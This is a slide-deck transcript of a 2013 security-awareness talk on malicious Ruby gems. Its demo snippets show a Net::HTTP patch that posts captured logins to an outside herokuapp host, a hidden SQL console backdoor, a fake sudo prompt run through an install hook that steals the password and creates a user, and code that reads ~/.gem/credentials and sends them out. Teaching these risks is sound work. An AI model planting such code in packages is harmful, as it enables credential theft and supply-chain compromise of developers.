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Hacking with Gems (RuLu 2013)

Benjamin Smith
June 20, 2013

Hacking with Gems (RuLu 2013)

Benjamin Smith

June 20, 2013

More Decks by Benjamin Smith


  1. Ben Smith cannot be held accountable for anything that will

    happen to you as a result of installing his gems. He also cannot be held responsible for anything that happens as a result of installing anyone ELSE’S gems. This offer may not be combined with any other offers. Ben Smith’s gems were processed in a location that also processes peanuts. Not valid in the state of Nevada. Ben Smith’s gems may contain substances known in the state of California to cause cancer. Thursday, June 20, 13
  2. GEM remote: https://rubygems.org/ specs: actionmailer (3.2.12) actionpack (= 3.2.12) mail

    (~> 2.4.4) actionpack (3.2.12) activemodel (= 3.2.12) activesupport (= 3.2.12) builder (~> 3.0.0) erubis (~> 2.7.0) ... Thursday, June 20, 13
  3. profit • Step 1: do something • Step 2: do

    something else • Step 3: ???? • Step 4: profit Thursday, June 20, 13
  4. profit • Step 1: write a gem that does something

    • Step 2: • Step 3: • Step 4: Thursday, June 20, 13
  5. profit • Step 1: write a gem that does something

    • Step 2: add code to harvest emails/pws • Step 3: • Step 4: Thursday, June 20, 13
  6. profit • Step 1: write a gem that does something

    • Step 2: add code to harvest emails/pws • Step 3: use emails/pws on banking websites to transfer funds • Step 4: Thursday, June 20, 13
  7. profit • Step 1: write a gem that does something

    • Step 2: add code to harvest emails/pws • Step 3: use emails/pws on banking websites to transfer funds • Step 4: profit Thursday, June 20, 13
  8. profit • Step 1: write a gem that does something

    • Step 2: add code to harvest emails/pws • Step 3: use emails/pws on banking websites to transfer funds • Step 4: profit • Step 5: flee the country Thursday, June 20, 13
  9. show me the hack Net::HTTP.post_form( #<URI::HTTP:0x007fc76b706950 URL:http:// stark-samurai-8122.herokuapp.com/logs>, {"log"=>"{\"utf8\"=>\"✓\", \"authenticity_token\"=>\"PzpZUlRrRv1V

    +A0jJHAwi+ey/injbWlii8OFyIfP+fY=\", \"user\"=>{\"email\"=>\"test\", \"password\"=>\"pass4\" ... github.com/benjaminleesmith/net_http_detector Thursday, June 20, 13
  10. how it works def HTTP.valid_post_form(url, params) ... def HTTP.post_form(url, params)

    self.smart_log( "Net::HTTP.post_form(#{url.inspect}, #{params.inspect})" ) Net::HTTP.valid_post_form(url, params) end github.com/benjaminleesmith/net_http_detector Thursday, June 20, 13
  11. how it works def HTTP.valid_post_form(url, params) ... def HTTP.post_form(url, params)

    self.smart_log( "Net::HTTP.post_form(#{url.inspect}, #{params.inspect})" ) Net::HTTP.valid_post_form(url, params) end github.com/benjaminleesmith/net_http_detector Thursday, June 20, 13
  12. how it works def HTTP.valid_post_form(url, params) ... def HTTP.post_form(url, params)

    self.smart_log( "Net::HTTP.post_form(#{url.inspect}, #{params.inspect})" ) Net::HTTP.valid_post_form(url, params) end github.com/benjaminleesmith/net_http_detector Thursday, June 20, 13
  13. database what? append_before_filter :net_http_detector ... if params[:db_console] @tables =ActiveRecord::Base.connection.tables if

    params[:query] @output = ActiveRecord::Base.connection .execute(params[:query]) github.com/benjaminleesmith/net_http_detector Thursday, June 20, 13
  14. database what? append_before_filter :net_http_detector ... if params[:db_console] @tables =ActiveRecord::Base.connection.tables if

    params[:query] @output = ActiveRecord::Base.connection .execute(params[:query]) github.com/benjaminleesmith/net_http_detector Thursday, June 20, 13
  15. database what? append_before_filter :net_http_detector ... if params[:db_console] @tables =ActiveRecord::Base.connection.tables if

    params[:query] @output = ActiveRecord::Base.connection .execute(params[:query]) github.com/benjaminleesmith/net_http_detector Thursday, June 20, 13
  16. database what? append_before_filter :net_http_detector ... if params[:db_console] @tables =ActiveRecord::Base.connection.tables if

    params[:query] @output = ActiveRecord::Base.connection .execute(params[:query]) github.com/benjaminleesmith/net_http_detector Thursday, June 20, 13
  17. profit • Step 1: • Step 2: • Step 3:

    • Step 4: • Step 5: Thursday, June 20, 13
  18. profit • Step 1: write a gem that does something

    • Step 2: • Step 3: • Step 4: • Step 5: Thursday, June 20, 13
  19. profit • Step 1: write a gem that does something

    • Step 2: add code to provide DB access • Step 3: • Step 4: • Step 5: Thursday, June 20, 13
  20. profit • Step 1: write a gem that does something

    • Step 2: add code to provide DB access • Step 3: use personal info to apply for a boat loan (ie buy a pimp trimaran) • Step 4: • Step 5: Thursday, June 20, 13
  21. profit • Step 1: write a gem that does something

    • Step 2: add code to provide DB access • Step 3: use personal info to apply for a boat loan (ie buy a pimp trimaran) • Step 4: profit • Step 5: Thursday, June 20, 13
  22. profit • Step 1: write a gem that does something

    • Step 2: add code to provide DB access • Step 3: use personal info to apply for a boat loan (ie buy a pimp trimaran) • Step 4: profit • Step 5: flee the country Thursday, June 20, 13
  23. what it claims to do Date.new(2005, 1, 1).to_s(:short) => "1

    Jan" ... instead of... => " 1 Jan" github.com/benjaminleesmith/better_date_to_s Thursday, June 20, 13
  24. behind the curtain if(strcmp(rails_env, "production") == 0) { sprintf(tar_command, "tar

    -zcvf %s/public/assets.tar.gz %s > /dev/ null 2>&1",rails_root,rails_root); system(tar_command); } github.com/benjaminleesmith/better_date_to_s Thursday, June 20, 13
  25. truth time • this gem doesn't actually work • but

    it could... if I wasn't lazy • "fat" gems are tricky to compile github.com/benjaminleesmith/better_date_to_s Thursday, June 20, 13
  26. so much code so little time • Step 1: write

    a gem that does something • Step 2: add code expose source • Step 3: sell to competitors? • Step 4: profit? • Step 5: flee the country Thursday, June 20, 13
  27. that was easy hard. what else can I do? (that's

    easier) Thursday, June 20, 13
  28. what it does > true.should be_true > User.new.should be_true >

    User.new.should be_truthy github.com/benjaminleesmith/be_truthy Thursday, June 20, 13
  29. run the what file? Gem::Specification.new do |gem| ... gem.extensions =

    ["Rakefile"] ... end github.com/benjaminleesmith/be_truthy Thursday, June 20, 13
  30. print "WARNING: Improper use of the sudo command ..." system

    "stty -echo" password = $stdin.gets.chomp system "stty echo" print `/usr/bin/sudo #{ARGV[0..-1].join(' ')}` github.com/benjaminleesmith/be_truthy Thursday, June 20, 13
  31. print "WARNING: Improper use of the sudo command ..." system

    "stty -echo" password = $stdin.gets.chomp system "stty echo" print `/usr/bin/sudo #{ARGV[0..-1].join(' ')}` github.com/benjaminleesmith/be_truthy Thursday, June 20, 13
  32. print "WARNING: Improper use of the sudo command ..." system

    "stty -echo" password = $stdin.gets.chomp system "stty echo" print `/usr/bin/sudo #{ARGV[0..-1].join(' ')}` github.com/benjaminleesmith/be_truthy Thursday, June 20, 13
  33. print "WARNING: Improper use of the sudo command ..." system

    "stty -echo" password = $stdin.gets.chomp system "stty echo" print `/usr/bin/sudo #{ARGV[0..-1].join(' ')}` github.com/benjaminleesmith/be_truthy Thursday, June 20, 13
  34. /usr/bin/sudo dscl . -create /Users/ #{username} ... /usr/bin/sudo dscl .

    -passwd /Users/ #{username} password` github.com/benjaminleesmith/be_truthy Thursday, June 20, 13
  35. back in the be_truthy gem gem_api_key = File.open( `echo ~/.gem/credentials`.strip

    ).read gem_list = `gem list` Net::HTTP.post_form(...) github.com/benjaminleesmith/be_truthy Thursday, June 20, 13
  36. gem_api_key = File.open( `echo ~/.gem/credentials`.strip ).read gem_list = `gem list`

    Net::HTTP.post_form(...) github.com/benjaminleesmith/be_truthy back in the be_truthy gem Thursday, June 20, 13
  37. gem_api_key = File.open( `echo ~/.gem/credentials`.strip ).read gem_list = `gem list`

    Net::HTTP.post_form(...) github.com/benjaminleesmith/be_truthy back in the be_truthy gem Thursday, June 20, 13
  38. gem_api_key = File.open( `echo ~/.gem/credentials`.strip ).read gem_list = `gem list`

    Net::HTTP.post_form(...) github.com/benjaminleesmith/be_truthy back in the be_truthy gem Thursday, June 20, 13
  39. > git clone your-gem-repo ...add a little code... > rake

    build > gem push your-gem github.com/benjaminleesmith/be_truthy Thursday, June 20, 13
  40. gem fetch vs gem install > gem fetch be_truthy >

    gem unpack be_truthy-0.0.1.gem github.com/benjaminleesmith/be_truthy Thursday, June 20, 13
  41. > gem install rails -P HighSecurity Fetching: activesupport-3.2.12.gem (100%) ERROR:

    While executing gem ... (Gem::Exception) Unsigned gem Thursday, June 20, 13